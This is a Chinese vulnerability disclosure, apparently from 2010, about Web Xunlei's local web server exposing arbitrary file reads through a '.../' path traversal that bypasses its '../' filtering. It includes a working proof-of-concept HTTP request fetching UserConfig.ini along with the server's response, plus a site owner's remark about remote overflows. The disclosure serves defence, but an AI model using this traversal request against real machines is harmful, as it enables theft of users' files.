漏洞详情

简要描述:

web迅雷在设计上和实现上存在问题,导致恶意攻击者可以读取安装有web迅雷的用户机器上的任意文件

详细说明:

web迅雷在本机存在有一webserver,并且绑定在0.0.0.0上,同时对于web请求处理并不恰当,存在安全缺陷导致恶意攻击者可以构造请求读取用户机器上的任意文件。
对于../跳目录的情况有处理,但是对于.../却可以绕过(某大师牛逼的分析思路,用file mon黑盒分析,赞!)

漏洞证明:

 

Web迅雷远程任意文件读取漏洞_目录

 

Web迅雷远程任意文件读取漏洞_目录_02

 

GET /.../Profiles/UserConfig.ini HTTP/1.1
HTTP/1.0 200 OK
Server: Xunlei Http Server/1.0Date: Tue, 23 Nov 2010 09:02:07 GMT
Content-type: *Content-length: 407Last-Modified: Tue, 23 Nov 2010 08:43:15 GMT

[Skin]CurrSkin=default.rar
SkinNames=default.rar
[Monitor]ExtendNames=.asf;.avi;.exe;.iso;.mp3;.mpeg;.mpg;.mpga;.ra;.rar;.rm;.rmvb;.tar;.w
ma;.wmp;.wmv;.zip;.torrent;FilterSitesMax=20[EMuleGenericSettings]EMuleWatchLink=1[Update]RunUpdate=0[General]TaskShowPerPage=11[Antivirus]Protect=0FilePath=Parameter=[BHOSection]StatsDay=2[SavePath]SetFolderIcon=1Path=C:\Xunlei\
发送 43, r接受 579: sock
C:\Documents and Settings\Administrator>

 

站长评论:

这个很早就有了,不光是Web迅雷存在此问题,历代迅雷客户端都存在此问题,还可以远程溢出,原因是迅雷为了p2p传输,在本地开了一个80端口,用于传输p2p数据,然后你懂了……

很早之前,就在路由上屏蔽了对外80端口,该问题比较危险